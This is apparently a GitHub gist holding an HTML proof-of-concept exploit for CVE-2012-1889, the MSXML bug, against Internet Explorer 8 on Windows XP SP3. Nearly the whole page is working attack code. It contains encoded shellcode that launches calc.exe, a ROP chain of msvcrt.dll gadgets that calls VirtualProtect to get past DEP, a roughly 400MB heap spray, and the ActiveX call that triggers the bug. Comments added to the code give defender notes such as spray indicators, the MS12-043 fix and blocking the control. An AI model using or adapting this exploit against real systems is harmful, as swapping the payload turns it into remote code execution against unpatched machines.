@evi1m0
Last active April 27, 2017 07:56
<html>
<head>
<title>IE8 CVE-2012-1889 BypassDEP Stable PoC</title>
</head>
<body>
<!--
Tested: WinXP 5.1.2600 Service Pack 3 Build 2600 IE8
Create: 2017-04-25, evi1m0.bat[at]gmail.com
msxml3!_dispatchImpl::InvokeHelper+0x9c:
037dd75a ff7528 push dword ptr [ebp+28h]
037dd75d 8b08 mov ecx,dword ptr [eax]
037dd75f ff7524 push dword ptr [ebp+24h]
037dd762 ff7520 push dword ptr [ebp+20h]
037dd765 57 push edi
037dd766 6a03 push 3
037dd768 ff7514 push dword ptr [ebp+14h]
037dd76b 68f8a77d03 push offset msxml3!GUID_NULL (037da7f8)
037dd770 53 push ebx
037dd771 50 push eax
037dd772 ff5118 call dword ptr [ecx+18h] // <<<
037dd775 89450c mov dword ptr [ebp+0Ch],eax
037dd778 8b06 mov eax,dword ptr [esi]
037dd77a 56 push esi
037dd77b ff5008 call dword ptr [eax+8] // <<<
037dd77e eb79 jmp msxml3!_dispatchImpl::InvokeHelper+0x13b (037dd7f9)
-->
<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='poc'></object>
<script>
// Proof-of-concept for the CVE-2012-1889 (MSXML) bug named in the page title,
// as tested on the XP SP3 / IE8 build listed in the HTML comment above.
// Structure: (1) a %u-encoded payload string, (2) a ROP chain of absolute
// addresses in msvcrt.dll, (3) a ~400MB heap spray of 0x0c0c0c0c blocks
// carrying the chain + payload, (4) a trigger call on the ActiveX object.
// Defender notes:
//  - The gadget addresses are hard-coded, so the chain is only valid on
//    builds where msvcrt.dll loads at a fixed base (no ASLR, as on XP);
//    ASLR-enabled systems and the vendor fix for this CVE (MS12-043) break it.
//  - unescape("%u....") payload strings, a tiny string doubled into a 1MB
//    block and copied hundreds of times, and the 0x0c0c0c0c / 0x0c0c0c08
//    fill pattern are classic heap-spray indicators for content inspection
//    and browser exploit-mitigation tooling.
//  - The ActiveX control is referenced by the CLSID on the <object> tag;
//    blocking that control (kill-bit / ActiveX filtering) removes the
//    trigger surface regardless of the spray.
// The payload's trailing bytes (0x63 0x61 0x6c 0x63 0x2e 0x65 0x78 0x65 0x00)
// spell "calc.exe" - a benign demonstration payload.
var shellcode = unescape("%u16eb%u315b%u50c0%ubb53%u23ad"+
"%u7c86%ud3ff%uc031%ubb50%ucafa%u7c81%ud"+
"3ff%ue5e8%uffff%u63ff%u6c61%u2e63%u7865"+
"%u0065");
// Each "%uXXXX%uYYYY" pair is one little-endian 32-bit value 0xYYYYXXXX;
// the trailing comment on each line gives the decoded address and gadget.
// All addresses lie in msvcrt.dll at its XP-era fixed load base.
var rop_chain = unescape(
// Rop Stackpivot
"%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
"%ubc13%u77be" + // 0x77bebc13 # POP EBP # RETN [msvcrt.dll]
"%u5ED5%u77BE" + // 0x77BE5ED5 # xchg eax, esp # retn [msvcrt.dll]
"%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
"%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
"%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
"%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
"%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
// Mana VirtualProtect
// The register setup below ends in a VirtualProtect call via PUSHAD, which
// is the DEP bypass the title refers to: the sprayed page is made executable.
"%ubc13%u77be" + // 0x77bebc13 # POP EBP # RETN [msvcrt.dll]
"%ubc13%u77be" + // 0x77bebc13 # skip 4 bytes [msvcrt.dll]
"%u5515%u77c0" + // 0x77c05515 # POP EBX # RETN [msvcrt.dll]
"%u0201%u0000" + // 0x00000201 # 0x00000201-> ebx
"%u0cb3%u77c2" + // 0x77c20cb3 # POP EDX # RETN [msvcrt.dll]
"%u0040%u0000" + // 0x00000040 # 0x00000040-> edx
"%u09ea%u77c1" + // 0x77c109ea # POP ECX # RETN [msvcrt.dll]
"%ufa05%u77c2" + // 0x77c2fa05 # &Writable location [msvcrt.dll]
"%u7a41%u77c1" + // 0x77c17a41 # POP EDI # RETN [msvcrt.dll]
"%u6101%u77c1" + // 0x77c16101 # RETN (ROP NOP) [msvcrt.dll]
"%u9dd4%u77c0" + // 0x77c09dd4 # POP ESI # RETN [msvcrt.dll]
"%uaacc%u77bf" + // 0x77bfaacc # JMP [EAX] [msvcrt.dll]
"%u1d16%u77bf" + // 0x77bf1d16 # POP EAX # RETN [msvcrt.dll]
"%u1131%u77be" + // 0x77be1120 # 0x20-0xEF&VirtualProtect() [IAT msvcrt.dll]
"%u67f0%u77c2" + // 0x77c267f0 # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
"%u1025%u77c2" + // 0x77c21025 # ptr to 'push esp # ret ' [msvcrt.dll]
"");
// HeapSpray 400MB
// "\u0c0c\u0c0c" doubles until it is 0x1000 UTF-16 units long; the 0x0c0c0c0c
// value serves both as filler and as the pointer value expected after the
// spray (see "0c0c0c08" below). This repeated pattern is what spray
// detectors look for.
var fill = "\u0c0c\u0c0c";
while (fill.length < 0x1000) fill += fill;
// `padding` and `evilcode` are assigned without `var` - implicit globals.
padding = fill.substring(0, 0x5F6);
evilcode = padding + rop_chain + shellcode;
// Pad each unit to exactly 0x800 units so the chain sits at a fixed offset
// within every repetition; the doubling loop then grows it to 1MB.
evilcode += fill.substring(0, 0x800 - padding.length - rop_chain.length - shellcode.length);
while (evilcode.length < 0x100000) evilcode += evilcode;
// Trim a few units from both ends; presumably to make each block's backing
// allocation (string header + data) land on the intended size - not verified here.
var block = evilcode.substring(2, 0x100000 - 0x21);
var slide = new Array();
// 400 copies of a ~1MB block = the ~400MB named above. substring over the full
// length is presumably meant to force a distinct copy per slot rather than
// aliasing one string; whether it does is engine-specific.
for (var i = 0; i < 400; i++){
slide[i] = block.substring(0, block.length);
}
// Blocks until the spray is done; also makes the page visibly interactive,
// which is itself an observable artifact of this PoC.
alert("Allocated!");
// 0c0c0c08
// `.object` is the ActiveX control instantiated from the CLSID on the
// <object id='poc'> tag in the page body.
var obj = document.getElementById('poc').object;
// Second controlled string: 0x0c0c0c08 repeated, prefixed with "\\xxx" and
// cut to just under 0x1000 units, then assigned as an <img> src. The page
// does not show which allocation this string is meant to occupy - TODO confirm
// against the CVE write-up before documenting further.
var src = unescape("%u0c08%u0c0c");
while (src.length < 0x1002) src += src;
src = "\\\\xxx" + src;
src = src.substr(0, 0x1000 - 10);
var pic = document.createElement("img");
pic.src = src;
// Bare property read; presumably present only for its side effect of
// materialising the src string in memory - not verified here.
pic.nameProp;
// The trigger: calling definition() on the uninitialized control is the
// CVE-2012-1889 condition named in the title. Everything above only prepares
// memory so that this call lands on attacker-shaped data; the vendor fix
// (MS12-043) and blocking the control's CLSID both stop it here.
obj.definition(0);
</script>
</body>
</html>